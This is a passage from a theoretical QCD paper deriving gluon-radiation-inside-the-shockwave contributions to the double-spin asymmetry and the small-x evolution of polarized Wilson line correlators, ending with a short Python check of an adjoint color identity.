\[M_{3}= \langle 0|\hat{a}_{c_{2},\lambda_{2}}(p_{2}^{+},{\bf x}_{2})\hat{a}_{c_{1},\lambda_{1}}(p_{1}^{+},{\bf x}_{1})\hat{S}(x^{+},x_{0}^{+})\hat{a}_{c,\lambda}^{\dagger}(p^{+},{\bf x}_{0})|0\rangle\] \[= -i\xi\int_{x_{0}^{+}}^{x^{+}}dw^{+}\langle 0|\hat{a}_{c_{2},\lambda_{2}}(p_{2}^{+},{\bf x}_{2})\hat{a}_{c_{1},\lambda_{1}}(p_{1}^{+},{\bf x}_{1})\hat{W}(x^{+},x_{0}^{+})\hat{V}_{ggga}(w^{+})\hat{W}(w^{+},x_{0}^{+})\hat{a}_{c,\lambda}^{\dagger}(p^{+},{\bf x}_{0})|0\rangle\] \[= -i\xi\int_{x_{0}^{+}}^{x^{+}}dw^{+}U^{c_{1}e_{1}}_{{\bf x}_{1}}(x^{+},w^{+})U^{c_{2}e_{2}}_{{\bf x}_{2}}(x^{+},w^{+})U^{cc}_{{\bf x}_{0}}(w^{+},x_{0}^{+})\] \[\qquad\times\,\langle 0|\hat{a}_{e_{1},\lambda_{1}}(p_{1}^{+},{\bf x}_{1})\hat{a}_{e_{2},\lambda_{2}}(p_{2}^{+},{\bf x}_{2})\hat{V}_{ggga}(w^{+})\hat{a}_{e,\lambda}^{\dagger}(p^{+},{\bf x}_{0})|0\rangle\] \[= (2\pi)2p^{+}\delta(-p^{+}+p_{1}^{+}+p_{2}^{+})\frac{1}{2p^{+}}\xi\int_{x_{0}^{+}}^{x^{+}}dw^{+}U^{c_{1}e_{1}}_{{\bf x}_{1}}(x^{+},w^{+})U^{c_{2}e_{2}}_{{\bf x}_{2}}(x^{+},w^{+})U^{ec}_{{\bf x}_{0}}(w^{+},x_{0}^{+})\] \[\times\left[(igf^{dee_{1}})[-{\cal D}^{i}_{{\bf x}_{2}}\delta({\bf x}_{2}-{\bf x}_{0})]_{de_{2}}\delta({\bf x}_{1}-{\bf x}_{0})\left(\varepsilon^{i}_{\lambda}\delta_{\lambda_{2},-\lambda_{1}}-\varepsilon^{i*}_{\lambda_{1}}\delta_{\lambda_{2}\lambda}-\frac{p^{+}+p_{1}^{+}}{p_{2}^{+}}\delta_{\lambda_{1}\lambda}\varepsilon^{i*}_{\lambda_{2}}\right)\right.\] \[\qquad+(igf^{dee_{2}})[-{\cal D}^{i}_{{\bf x}_{1}}\delta({\bf x}_{1}-{\bf x}_{0})]_{de_{1}}\delta({\bf x}_{2}-{\bf x}_{0})\left(\varepsilon^{i}_{\lambda}\delta_{\lambda_{1},-\lambda_{2}}-\varepsilon^{i*}_{\lambda_{2}}\delta_{\lambda_{1}\lambda}-\frac{p^{+}+p_{2}^{+}}{p_{1}^{+}}\delta_{\lambda\lambda_{2}}\varepsilon^{i*}_{\lambda_{1}}\right)\] \[\qquad+(igf^{de_{1}e_{2}})[-{\cal D}^{i}_{{\bf x}_{0}}\delta({\bf x}_{2}-{\bf x}_{0})]_{de}\delta({\bf x}_{1}-{\bf x}_{2})\left(\delta_{\lambda\lambda_{2}}\varepsilon^{i*}_{\lambda_{1}}-\delta_{\lambda\lambda_{1}}\varepsilon^{i*}_{\lambda_{2}}-\frac{p_{1}^{+}-p_{2}^{+}}{p^{+}}\varepsilon^{i}_{\lambda}\delta_{\lambda_{1},-\lambda_{2}}\right)\Big{]} \tag{4.2}\] Here \(\hat{V}_{ggga}\) represents the background field induced triple gluon interaction vertex given in eq. (38). Of the two contributing vertices in eq. (38), one is local in the longitudinal coordinate while the other is nonlocal. Eq. (4.2) needs to be simplified by taking the limit \(z\to 0\) with \(p_{1}^{+}=zp^{+}\). In fact, terms that contain the polarization factor \(\delta_{\lambda\lambda_{2}}\varepsilon^{i*}_{\lambda_{1}}\) can be ignored because they do not communicate the polarization of the incoming gluon to the outgoing gluons; they lead to a final result independent of the incoming gluon polarization and thus do not contribute to the double-spin asymmetry. It is interesting to note that these terms happen to involve the factor \(1/z\) in the soft gluon limit. There is also the possible combination in which the \(1/z\) order gluon radiation inside the shockwave in the amplitude combines with the complex conjugate amplitude in which the next-to-eikonal (order \(z\), see appendix B for the explicit expression) gluon is radiated either before or after the eikonal scatterings. This combination turns out to give exactly the same result as eq. (4.5).

Figure 4: The interference terms involving gluon radiation inside the shock wave. The red gluon line inside the shockwave represents the background gluon fields. The green cross indicates the tagged soft gluon.
Keeping only terms at order \(z^{0}\) and excluding terms proportional to \(\delta_{\lambda\lambda_{2}}\varepsilon^{i*}_{\lambda_{1}}\), the simplified expression of \(M_{3}\) contributing to the double-spin asymmetry is \[\begin{split}\mathcal{M}_{3}=&\frac{1}{2p^{+}}\int_{x_{0}^{+}}^{x^{+}}dw^{+}U^{c_{1}e_{1}}_{\mathbf{x}_{1}}(x^{+},w^{+})U^{c_{2}e_{2}}_{\mathbf{x}_{2}}(x^{+},w^{+})U^{ec}_{\mathbf{x}_{0}}(w^{+},x_{0}^{+})\\ &\times\left(igf^{ee_{1}e_{2}}\left[-\partial^{i}_{\mathbf{x}_{2}}\delta(\mathbf{x}_{2}-\mathbf{x}_{0})\delta(\mathbf{x}_{1}-\mathbf{x}_{0})+\partial^{i}_{\mathbf{x}_{1}}\delta(\mathbf{x}_{1}-\mathbf{x}_{0})\delta(\mathbf{x}_{2}-\mathbf{x}_{0})-\partial^{i}_{\mathbf{x}_{0}}\delta(\mathbf{x}_{2}-\mathbf{x}_{0})\delta(\mathbf{x}_{1}-\mathbf{x}_{2})\right]\\ &\quad+ig^{2}a^{i}_{b}(\mathbf{x}_{1})\delta(\mathbf{x}_{2}-\mathbf{x}_{0})\delta(\mathbf{x}_{1}-\mathbf{x}_{0})2(T^{e}T^{e_{1}})_{e_{2}b}\right)\left(\varepsilon^{i}_{\lambda}\delta_{\lambda_{2},-\lambda_{1}}-\delta_{\lambda_{1}\lambda}\varepsilon^{i*}_{\lambda_{2}}\right)\end{split} \tag{4.3}\] In the above expression, we have explicitly separated the spatial derivative terms from the terms containing the background gluon field. When computing the interference term \(M_{3}M_{2}^{*}\), the relevant polarization sum is \[\sum_{\lambda_{1},\lambda_{2}}\left(\delta_{\lambda_{2},-\lambda_{1}}\varepsilon^{i}_{\lambda}-\delta_{\lambda\lambda_{1}}\varepsilon^{i*}_{\lambda_{2}}\right)\delta_{\lambda^{\prime}\lambda_{2}}\varepsilon^{j}_{\lambda_{1}}=\varepsilon^{i}_{\lambda}\varepsilon^{j*}_{\lambda^{\prime}}-\varepsilon^{j}_{\lambda}\varepsilon^{i*}_{\lambda^{\prime}}=\delta_{\lambda\lambda^{\prime}}(-i\lambda\epsilon^{ij}). \tag{4.4}\] The final result for the interference term \(M_{3}M_{2}^{*}\) is \[\begin{split}&\int_{\mathbf{x}_{1},\mathbf{x}_{1}^{\prime}}e^{-i\mathbf{p}_{1}\cdot(\mathbf{x}_{1}-\mathbf{x}_{1}^{\prime})}\sum_{c,c_{1},c_{2},\lambda_{1},\lambda_{2}}\int_{\mathbf{x}_{2},p_{2}^{+},\mathbf{x}_{0},\mathbf{x}_{0}^{\prime}}\mathcal{M}_{3}\mathcal{M}_{2}^{*}(2\pi)2p^{+}\delta(p^{+}-p_{1}^{+}-p_{2}^{+})+c.c.\\ =&-\lambda\delta_{\lambda\lambda^{\prime}}2g^{2}N_{c}\int_{\mathbf{x}_{1},\mathbf{x}_{1}^{\prime}}e^{-i\mathbf{p}_{1}\cdot(\mathbf{x}_{1}-\mathbf{x}_{1}^{\prime})}\frac{1}{2\pi}\frac{\varepsilon^{ij}(\mathbf{x}_{1}^{\prime}-\mathbf{x}_{1})^{j}}{|\mathbf{x}_{1}^{\prime}-\mathbf{x}_{1}|^{2}}\\ &\qquad\times\frac{1}{2p^{+}}\int_{x_{0}^{+}}^{x^{+}}dw^{+}\mathrm{Tr}\left[U_{\mathbf{x}_{1}}(x^{+},w^{+})\left(\overrightarrow{\mathcal{D}}^{i}_{\mathbf{x}_{1}}-\overleftarrow{\mathcal{D}}^{i}_{\mathbf{x}_{1}}\right)U_{\mathbf{x}_{1}}(w^{+},x_{0}^{+})U^{\dagger}_{\mathbf{x}_{1}^{\prime}}\right]+c.c.\\ =&-\lambda\delta_{\lambda\lambda^{\prime}}4g^{2}N_{c}\int_{\mathbf{x}_{1},\mathbf{x}_{1}^{\prime}}e^{-i\mathbf{p}_{1}\cdot(\mathbf{x}_{1}-\mathbf{x}_{1}^{\prime})}\frac{1}{2\pi}\frac{\varepsilon^{ij}(\mathbf{x}_{1}^{\prime}-\mathbf{x}_{1})^{j}}{|\mathbf{x}_{1}^{\prime}-\mathbf{x}_{1}|^{2}}\mathrm{Tr}\left[U^{iG[2]}_{\mathbf{x}_{1}}U^{\dagger}_{\mathbf{x}_{1}^{\prime}}\right]+c.c.\end{split} \tag{4.5}\] In obtaining the first equality, we have simplified the Wilson line structures as follows \[\begin{split}& U^{c_{1}c_{1}^{\prime}}_{\mathbf{x}_{1}}(x^{+},w^{+})U^{c_{2}c_{2}^{\prime}}_{\mathbf{x}_{1}}(x^{+},w^{+})U^{c_{\prime}c}_{\mathbf{x}_{1}}(w^{+},x_{0}^{+})\left[-U_{\mathbf{x}_{1}^{\prime}}T^{c}U^{\dagger}_{\mathbf{x}_{1}}\right]
^{c_{1}c_{2}}2(T^{c^{\prime}}T^{c_{1}^{\prime}})_{c_{2}^{\prime}b}\\ &=-2N_{c}\mathrm{Tr}\left[U_{\mathbf{x}_{1}}(x^{+},w^{+})T^{b}U_{ \mathbf{x}_{1}}(w^{+},x_{0}^{+})U^{\dagger}_{\mathbf{x}_{1}^{\prime}}\right]. \end{split} \tag{4.6}\] \[\begin{split}&\int_{\mathbf{x}_{0}}U^{c_{1}c_{1}^{\prime}}_{ \mathbf{x}_{1}}(x^{+},w^{+})U^{c_{2}c_{2}^{\prime}}_{\mathbf{x}_{1}}(x^{+},w^{+ })U^{c_{\prime}c}_{\mathbf{x}_{0}}(w^{+},x_{0}^{+})\left[-U_{\mathbf{x}_{1}^{ \prime}}T^{c}U^{\dagger}_{\mathbf{x}_{1}}\right]^{c_{1}c_{2}}if^{c^{\prime}c_ {1}^{\prime}c_{2}^{\prime}}[-\partial^{i}_{\mathbf{x}_{0}}\delta(\mathbf{x}_{1}- \mathbf{x}_{0})]\\ =&-N_{c}\mathrm{Tr}\left[U_{\mathbf{x}_{1}^{\prime}} \partial^{i}_{\mathbf{x}_{1}}U^{\dagger}_{\mathbf{x}_{1}}(w^{+},x_{0}^{+})U^{ \dagger}_{\mathbf{x}_{1}}(x^{+},w^{+})\right]\\ &\qquad-\mathrm{Tr}\left[U_{\mathbf{x}_{1}^{\prime}}U^{\dagger}_{ \mathbf{x}_{1}}(w^{+},x_{0}^{+})T^{c^{\prime}}(\partial^{i}_{\mathbf{x}_{1}}U_{ \mathbf{x}_{1}}(w^{+},x_{0}^{+}))U^{\dagger}_{\mathbf{x}_{1}}(w^{+},x_{0}^{+})T^{c ^{\prime}}U^{\dagger}_{\mathbf{x}_{1}}(x^{+},w^{+})\right].\end{split} \tag{4.7}\] \[\begin{split}&\int_{\mathbf{x}_{2}}U^{c_{1}c_{1}^{\prime}}_{ \mathbf{x}_{1}}(x^{+},w^{+})U^{c_{2}c_{2}^{\prime}}_{\mathbf{x}_{2}}(x^{+},w^{+ })U^{c_{\prime}c}_{\mathbf{x}_{1}}(w^{+},x_{0}^{+})\left[-U_{\mathbf{x}_{1}^{ \prime}}T^{c}U^{\dagger}_{\mathbf{x}_{2}}\right]^{c_{1}c_{2}}if^{c^{\prime}c_ {1}^{\prime}c_{2}^{\prime}}\left[-\partial^{i}_{\mathbf{x}_{2}}\delta(\mathbf{x}_{2}- \mathbf{x}_{1})\right]\\ =&-\mathrm{Tr}\left[U_{\mathbf{x}_{1}^{\prime}}U^{ \dagger}_{\mathbf{x}_{1}}(w^{+},x_{0}^{+})T^{c^{\prime}}U_{\mathbf{x}_{1}}(w^{+ },x_{0}^{+})\partial^{i}_{\mathbf{x}_{1}}U^{\dagger}_{\mathbf{x}_{1}}(w^{+},x_{0 }^{+})T^{c^{\prime}}U^{\dagger}_{\mathbf{x}_{1}}(x^{+},w^{+})\right].\end{split} \tag{4.8}\] \[\int_{\mathbf{x}_{0}}U^{c_{1}c^{\prime}_{1}}_{\mathbf{x}_{1}}(x^{+},w^ {+})U^{c_{2}c^{\prime}_{2}}_{\mathbf{x}_{0}}(x^{+},w^{+})U^{c^{\prime}c}_{\mathbf{ x}_{0}}(w^{+},x_{0}^{+})\left[-U_{\mathbf{x}^{\prime}_{1}}T^{c}U^{\dagger}_{ \mathbf{x}_{0}}\right]^{c_{1}c_{2}}if^{c^{\prime}c^{\prime}_{1}c^{\prime}_{2}} \partial^{i}_{\mathbf{x}_{1}}\delta(\mathbf{x}_{1}-\mathbf{x}_{0}) \tag{4.9}\] \[= N_{c}\mathrm{Tr}[\partial^{i}_{\mathbf{x}_{1}}U_{\mathbf{x}_{1}} (x^{+},w^{+})U_{\mathbf{x}_{1}}(w^{+},x_{0}^{+})U^{\dagger}_{\mathbf{x}^{ \prime}_{1}}].\] In the last expression, we have used integration by parts for \(\partial^{i}_{\mathbf{x}_{1}}\), noting that \[\epsilon^{ij}\mathbf{p}^{i}\int_{\mathbf{x}_{1},\mathbf{x}^{\prime}_{1}}e^{-i \mathbf{p}_{1}\cdot(\mathbf{x}_{1}-\mathbf{x}^{\prime}_{1})}\frac{(\mathbf{x} ^{\prime}_{1}-\mathbf{x}_{1})^{j}}{|\mathbf{x}^{\prime}_{1}-\mathbf{x}_{1}|^{ 2}}\langle\mathrm{Tr}[U_{\mathbf{x}_{1}}U^{\dagger}_{\mathbf{x}^{\prime}_{1}}] \rangle=0. \tag{4.10}\] Eq. (4.5) is expressed in terms of the polarized Wilson line with spatial index \[U^{iG[2]}_{\mathbf{x}_{1}}(k^{+})= \frac{1}{2k^{+}}\int_{-\infty}^{+\infty}dx^{+}_{1}U_{\mathbf{x}_{ 1}}[+\infty,x^{+}_{1}]\frac{1}{2}\Big{[}\overrightarrow{\mathcal{D}}^{i}_{ \mathbf{x}_{1}}-\overleftarrow{\mathcal{D}}^{i}_{\mathbf{x}_{1}}\Big{]}U_{ \mathbf{x}_{1}}[x^{+}_{1},-\infty]. \tag{4.11}\] Using the identity \[\int_{x^{+}_{0}}^{x^{+}}dz^{+}U_{\mathbf{x}}(x^{+},z^{+})f^{-i}(z^ {+},\mathbf{x})U_{\mathbf{x}}(z^{+},x^{+}_{0}) \tag{4.12}\] \[= a^{i}(x^{+},\mathbf{x})U_{\mathbf{x}}(x^{+},x^{+}_{0})-U_{ \mathbf{x}}(x^{+},x^{+}_{0})a^{i}(x^{+}_{0},\mathbf{x})+\frac{1}{ig}\partial^ {i}U_{\mathbf{x}}(x^{+},x^{+}_{0}),\] eq. 
(4.11) can be reexpressed as [19; 21] \[U^{iG[2]}_{\mathbf{x}_{1}}(k^{+})=-\frac{ig}{2k^{+}}\int_{-\infty}^{+\infty} dx^{+}_{1}x^{+}_{1}U_{\mathbf{x}_{1}}(+\infty,x^{+}_{1})f^{-i}(x^{+}_{1}, \mathbf{x}_{1})U_{\mathbf{x}_{1}}(x^{+}_{1},-\infty), \tag{4.13}\] which clearly shows that \(U^{iG[2]}_{\mathbf{x}_{1}}(k^{+})\) is determined by the chromo-electric field \(f^{-i}(x^{+}_{1},\mathbf{x}_{1})\). One can repeat the calculation for the second diagram in Fig. 4, it vanishes because of \(\mathrm{Tr}[U^{i\,G[2]}_{\mathbf{x}_{1}}U^{\dagger}_{\mathbf{x}_{1}}]=0\). Eq. (4.5) is the main result of this section, which clearly shows that gluon radiation inside the shockwave contribute to longitudinal double-spin asymmetry in soft gluon production. Furthermore, its contribution is in the form of chromo-electrically polarized Wilson line correlator. ### Small \(x\) evolution of polarized Wilson line correlator In this section, we calculate the amplitude shown in Fig. 5. They come from one step rapidity evolution of the chromo-magnetically polarized gluon dipole correlator \(\langle\mathrm{Tr}[U^{G[1]}_{\mathbf{x}_{1}}U^{\dagger}_{\mathbf{x}_{2}}]\rangle\). The two diagrams represent contributions from gluon radiation inside the shockwave. We use two different methods to do the calculations. One is an operator treatment that was used by many groups [12; 23; 31]. The other method is to directly compute the two diagrams. #### 4.2.1 Operator treatment We begin with the definition of the chromo-magnetically polarized gluon Wilson line correlator \[\left\langle\mathrm{Tr}\left[U^{G[1]}_{\mathbf{x}_{1}}U^{\dagger}_{\mathbf{x}_{ 2}}\right]\right\rangle(k^{+})=-\frac{2ig}{2k^{+}}\int_{-\infty}^{+\infty}dx^ {+}_{1}\left\langle\mathrm{Tr}\left[U_{\mathbf{x}_{1}}[+\infty,x^{+}_{1}]f^{12 }(x^{+}_{1},0^{-},\mathbf{x}_{1})U_{\mathbf{x}_{1}}[x^{+}_{1},-\infty]U^{ \dagger}_{\mathbf{x}_{2}}\right]\right\rangle \tag{4.14}\] he field strength tensor \(f^{12}\) carries longitudinal momentum \(k^{+}\). We decomposed it into a quantum part and a classical part by \(a^{i}(k^{+})\to A^{i}(k^{\prime+})+a^{i}(k^{+}-\delta k^{+})\) with \(k^{+}-\delta k^{+}<k^{\prime+}<k^{+}\). One then integrates out the quantum degrees of freedom \(A^{i}(k^{\prime+})\) in the infinitesimal strip of longitudinal momentum \(\delta k^{+}\). The separation into classical fields and quantum fluctuations is given by \[f^{12}=\frac{1}{2}\epsilon^{ij}f^{ij} \tag{4.15}\] \[= \frac{1}{2}\epsilon^{ij}\Big{(}\partial^{i}a^{j}-\partial^{j}a^ {i}+ig[a^{i},a^{j}]+\partial^{i}A^{j}-\partial^{j}A^{i}+ig[A^{i},A^{j}]+ig[A^ {i},a^{j}]+ig[a^{i},A^{j}]\Big{)}\] \[= \frac{1}{2}\epsilon^{ij}\Big{(}f^{ij}+ig[A^{i},A^{j}]\Big{)}+ \epsilon^{ij}\Big{(}\partial^{i}A^{j}+ig[a^{i},A^{j}]\Big{)}.\] We will focus on the piece \(\epsilon^{ij}(\partial^{i}A^{j}+ig[a^{i},A^{j}])\) which is linear in quantum fluctuating fields. Let the shockwave locate within the narrow range \([-L^{+},L^{+}]\) around \(0^{+}\). We further require that \(-L^{+}<x_{1}^{+}<L^{+}\). In other words, the chromo-magnetic field lies inside the shockwave. The situations that the chromo-magnetic field lies before or after the shockwave have been studied in [12]. 
The eikonal Wilson line \(U_{\mathbf{x}_{2}}\) also needs to be expanded to linear order in quantum fluctuation field \[U_{\mathbf{x}_{2}}^{mn}\simeq-ig\int_{-\infty}^{+\infty}dx_{2}^{+}U_{\mathbf{x }_{2}}[+\infty,x_{2}^{+}]A^{-}(x_{2}^{+},0^{-},\mathbf{x}_{2})U_{\mathbf{x}_{ 2}}[x_{2}^{+},-\infty] \tag{4.16}\] We consider two options for the ordering of \(x_{2}^{+}\) with respect to \([-L^{+},L^{+}]\). One is that \(x_{2}^{+}>L^{+}\) and the other is \(x_{2}^{+}<-L^{+}\), corresponding to the two diagrams in Fig. 5, respectively. Then Eq. (4.14), in reference to Fig. 5, can be written as the sum of the two cases \[\mathcal{M}_{\text{I}}= \frac{2g^{2}}{2k^{+}}\epsilon^{ij}\int_{-\infty}^{+\infty}dx_{1} ^{+}\int_{L^{+}}^{+\infty}dx_{2}^{+}\Big{\langle}\text{Tr}\Big{[}U_{\mathbf{ x}_{1}}[+\infty,x_{1}^{+}]\left(\partial^{i}A^{j}+ig[a^{i},A^{j}]\right)U_{ \mathbf{x}_{1}}[x_{1}^{+},-\infty] \tag{4.17}\] \[\qquad\times U_{\mathbf{x}_{2}}^{\dagger}[x_{2}^{+},-\infty]A^{- }(x_{2}^{+},0^{-},\mathbf{x}_{2})\Big{]}\Big{\rangle}\] Figure 5: The single logarithmic contribution to small \(x\) evolution of \(\langle\text{Tr}[U_{\mathbf{x}_{1}}^{G[1]}U_{\mathbf{x}_{2}}^{\dagger}]\rangle\). The red gluon lines represent the background gluon fields. and \[\begin{split}\mathcal{M}_{\rm II}=&\frac{2g^{2}}{2k^{+}} \epsilon^{ij}\int_{-\infty}^{+\infty}dx_{1}^{+}\int_{-\infty}^{-L^{+}}dx_{2}^{+} \Big{\langle}{\rm Tr}\Big{[}U_{{\bf x}_{1}}[+\infty,x_{1}^{+}]\left(\partial^{ i}A^{j}+ig[a^{i},A^{j}]\right)U_{{\bf x}_{1}}[x_{1}^{+},-\infty]\\ &\qquad\qquad\times A^{-}(x_{2}^{+},0^{-},{\bf x}_{2})U_{{\bf x} _{2}}^{\dagger}[+\infty,x_{2}^{+}]\Big{]}\Big{\rangle}.\end{split} \tag{4.18}\] The calculation of these two expressions follows very similar analysis. We first calculate \(\mathcal{M}_{\rm I}\), which can be written as \[\begin{split}\mathcal{M}_{\rm I}=&\frac{2g^{2}}{2k^ {+}}\epsilon^{ij}\int_{-\infty}^{+\infty}dx_{1}^{+}\int_{L^{+}}^{+\infty}dx_{2 }^{+}\Big{\langle}{\rm Tr}\Big{[}U_{{\bf x}_{1}}[+\infty,x_{1}^{+}]T^{e}U_{{ \bf x}_{1}}[x_{1}^{+},-\infty]U_{{\bf x}_{2}}^{\dagger}T^{b}\Big{]}\Big{\rangle} \\ &\qquad\times\Big{(}\delta_{ed}\partial_{{\bf x}_{1}}^{i}-gf^{ ecd}a_{c}^{i}(x_{1}^{+},0^{-},{\bf x}_{1})\Big{)}\,\Big{\langle}A_{d}^{j}(x_{1}^{+},0^{-},{\bf x}_{1})A_{b}^{-}(x_{2}^{+},0^{-},{\bf x}_{2})\Big{\rangle}.\end{split} \tag{4.19}\] Because of \(x_{2}^{+}>L^{+}\), we have set \(U_{{\bf x}_{2}}^{\dagger}[x_{2}^{+},-\infty]=U_{{\bf x}_{2}}^{\dagger}[+\infty,-\infty]\equiv U_{{\bf x}_{2}}^{\dagger}\). The quantum flucations need to be averaged out by computing the two field correlation function in the background field \[\begin{split}&\int_{L^{+}}^{+\infty}dx_{2}^{+}\,\Big{\langle}A_{d}^{ j}(x_{1}^{+},0^{-},{\bf x}_{1})A_{b}^{-}(x_{2}^{+},0^{-},{\bf x}_{2})\Big{\rangle} \\ =&\int_{L^{+}}^{+\infty}dx_{2}^{+}\,\Big{\langle}0 \,\Big{|}A_{b}^{-}(x_{2}^{+},0^{-},{\bf x}_{2})\hat{S}(L^{+},x_{1}^{+})A_{d}^{ j}(x_{1}^{+},0^{-},{\bf x}_{1})\Big{|}\,0\Big{\rangle}\,.\end{split} \tag{4.20}\] The interaction with the shockwave only happens within the range \([L^{+},x_{1}^{+}]\). Substituting the mode expansions for the fields \(A^{j}\) and \(A^{+}\) and using eikonal transformation of gluon creation operator \[\hat{S}(L^{+},x_{1}^{+})\hat{a}_{d,\lambda_{1}}^{\dagger}(p_{1},{\bf p}_{1}) \hat{S}^{\dagger}(L^{+},x_{1}^{+})=\int d^{2}{\bf w}_{1}e^{i{\bf p}_{1}\cdot{ \bf w}_{1}}\hat{a}_{h,\lambda_{1}}^{\dagger}(p_{1}^{-},{\bf w}_{1})U_{{\bf w}_ {1}}^{hd}(L^{+},x_{1}^{+}), \tag{4.21}\] the two field correlator in eq. 
(4.20) can be computed as \[\begin{split}&\int_{L^{+}}^{+\infty}dx_{2}^{+}\Big{\langle}0 \Big{|}A_{b}^{-}(x_{2}^{+},0^{-},{\bf x}_{2})\hat{S}(L^{+},x_{1}^{+})A_{d}^{j} (x_{1}^{+},0^{-},{\bf x}_{1})\Big{|}0\Big{\rangle}\\ =&\int_{L^{+}}^{+\infty}dx_{2}^{+}\sum_{\lambda_{1}, \lambda_{2}}\int_{p_{1}^{+},p_{2}^{+},{\bf p}_{1},{\bf p}_{2}}\Big{[}e^{-i\frac {{\bf p}_{2}^{2}}{2p_{2}^{2}}x_{2}^{+}}e^{i{\bf p}_{2}\cdot{\bf x}_{2}}e^{i \frac{{\bf p}_{1}^{2}}{2p_{1}^{2}}x_{1}^{+}}e^{-i{\bf p}_{1}\cdot{\bf x}_{1}} \varepsilon_{\lambda_{2}}^{-}(p_{2}^{+},{\bf p}_{2})\varepsilon_{\lambda_{1}}^ {j*}(p_{1}^{+},{\bf p}_{1})\\ &\times\int d{\bf w}_{2}d{\bf w}_{1}e^{-i{\bf p}_{2}\cdot{\bf w} _{2}}e^{i{\bf p}_{1}\cdot{\bf w}_{1}}U_{{\bf w}_{1}}^{hd}(L^{+},x_{1}^{+}) \left[\delta_{bh}\,\delta_{\lambda_{1}\lambda_{2}}(2\pi)2p_{1}^{+}\delta(p_{1} ^{+}-p_{2}^{+})\delta^{(2)}({\bf w}_{1}-{\bf w}_{2})\right]\\ =&\int_{{\bf p}_{2},{\bf p}_{1},p_{1}^{+}_{1}}\Big{[}e ^{-i\frac{{\bf p}_{2}^{2}}{2p_{1}^{2}}L^{+}}e^{i{\bf p}_{2}\cdot{\bf x}_{2}}e^{i \frac{{\bf p}_{1}^{2}}{2p_{1}^{2}}x_{1}^{+}}e^{-i{\bf p}_{1}\cdot{\bf x}_{1}}(- i)\frac{2{\bf p}_{2}^{2}}{{\bf p}_{2}^{2}}\int d{\bf w}_{1}e^{-i{\bf p}_{2} \cdot{\bf w}_{1}}e^{i{\bf p}_{1}\cdot{\bf w}_{1}}U_{{\bf w}_{1}}^{bd}(L^{+},x_{1 }^{+})\Big{]}\\ =&\int_{p_{1}^{+}}e^{i\frac{{\bf p}_{2}^{2}}{2p_{1}^{ +}}L^{+}}e^{-i\frac{{\bf q}_{1}^{2}}{2p_{1}^{2}}x_{1}^{+}}\frac{2}{2\pi} \frac{({\bf x}_{2}-{\bf x}_{1})^{j}}{|{\bf x}_{2}-{\bf x}_{1}|^{2}}U_{{\bf x}_{ 1}}^{bd}(L^{+},x_{1}^{+})\\ \simeq&\int_{\delta k^{+}}\,\frac{dp_{1}^{+}}{p_{1}^{+ }}\frac{1}{(2\pi)^{2}}\frac{({\bf x}_{2}-{\bf x}_{1})^{j}}{|{\bf x}_{2}-{\bf x }_{1}|^{2}}U_{{\bf x}_{1}}^{bd}(L^{+},x_{1}^{+}).\end{split} \tag{4.22}\] In obtaining the last equality, we have ignored the phase factors as they will introduce higher order eikonality contributions. The integration over the longitudinal momentum is restricted within the infinitesimal range \(\delta k^{+}\). In obtaining the second equality, we have carried out the integrals of \(p_{2}^{+}\) and \(x_{2}^{+}\). The integration over \(x_{2}^{+}\) is given by \[\int_{L^{+}}^{+\infty}dx_{2}^{+}e^{-i\frac{\mathbf{p}_{2}^{2}}{2p_{2}^{+}}x_{2 }^{+}}=-i\frac{2p_{2}^{+}}{\mathbf{p}_{2}^{2}}e^{-i\frac{\mathbf{p}_{2}^{2}}{2p _{2}^{+}}L^{+}}. \tag{119}\] Taking into account of eq. (118), the Wilson line structure in eq. (105) can be simplified as \[\begin{split}&\mathrm{Tr}\Big{[}T^{b}U_{\mathbf{x}_{1}}[+\infty,x_{1}^ {+}]T^{e}U_{\mathbf{x}_{1}}[x_{1}^{+},-\infty]U_{\mathbf{x}_{2}}^{\dagger} \Big{]}\partial_{\mathbf{x}_{1}}^{i}U_{\mathbf{x}_{1}}^{be}[+\infty,x_{1}^{+}] \\ =& N_{c}\mathrm{Tr}\Big{[}\partial_{\mathbf{x}_{1}} ^{i}U_{\mathbf{x}_{1}}[+\infty,x_{1}^{+}]U_{\mathbf{x}_{1}}[x_{1}^{+},-\infty ]U_{\mathbf{x}_{2}}^{\dagger}\Big{]}-\mathrm{Tr}\Big{[}T^{b}\partial_{\mathbf{ x}_{1}}^{i}U_{\mathbf{x}_{1}}[+\infty,x_{1}^{+}]U_{\mathbf{x}_{1}}[x_{1}^{+},- \infty]T^{d}U_{\mathbf{x}_{2}}^{\dagger}\Big{]}U_{\mathbf{x}_{1}}^{bd}\\ =&\frac{1}{2}N_{c}\mathrm{Tr}\Big{[}\partial_{ \mathbf{x}_{1}}^{i}U_{\mathbf{x}_{1}}[+\infty,x_{1}^{+}]U_{\mathbf{x}_{1}}[x_{ 1}^{+},-\infty]U_{\mathbf{x}_{2}}^{\dagger}\Big{]}.\end{split} \tag{120}\] We have used the color identity \(T^{d}T^{e}T^{d}=\frac{1}{2}N_{c}T^{e}\) in obtaining the last equality. 
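As a quick cross-check of the adjoint-representation color identity \(T^{d}T^{e}T^{d}=\frac{1}{2}N_{c}T^{e}\) used above (it follows from \(f^{acd}f^{bcd}=N_{c}\delta^{ab}\)), the following Python sketch, added here purely as an illustration rather than as part of the original derivation, verifies the identity numerically for SU(2), where the adjoint generators are \((T^{a})_{bc}=-i\epsilon_{abc}\) and the right-hand side reduces to \(T^{e}\); the same check can be repeated for SU(3) with its structure constants.

```python
import numpy as np

# Illustrative check, not taken from the paper.
# Levi-Civita tensor in three dimensions
eps = np.zeros((3, 3, 3))
eps[0, 1, 2] = eps[1, 2, 0] = eps[2, 0, 1] = 1.0
eps[0, 2, 1] = eps[2, 1, 0] = eps[1, 0, 2] = -1.0

# Adjoint generators of SU(2): (T^a)_{bc} = -i * eps_{abc}; here N = 2
T = [-1j * eps[a] for a in range(3)]

# f^{acd} f^{bcd} = N * delta^{ab}
assert np.allclose(np.einsum('acd,bcd->ab', eps, eps), 2.0 * np.eye(3))

# sum_d T^d T^e T^d = (N/2) T^e = T^e for every e
for e in range(3):
    lhs = sum(T[d] @ T[e] @ T[d] for d in range(3))
    assert np.allclose(lhs, T[e])

print("adjoint identity T^d T^e T^d = (N/2) T^e verified for N = 2")
```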
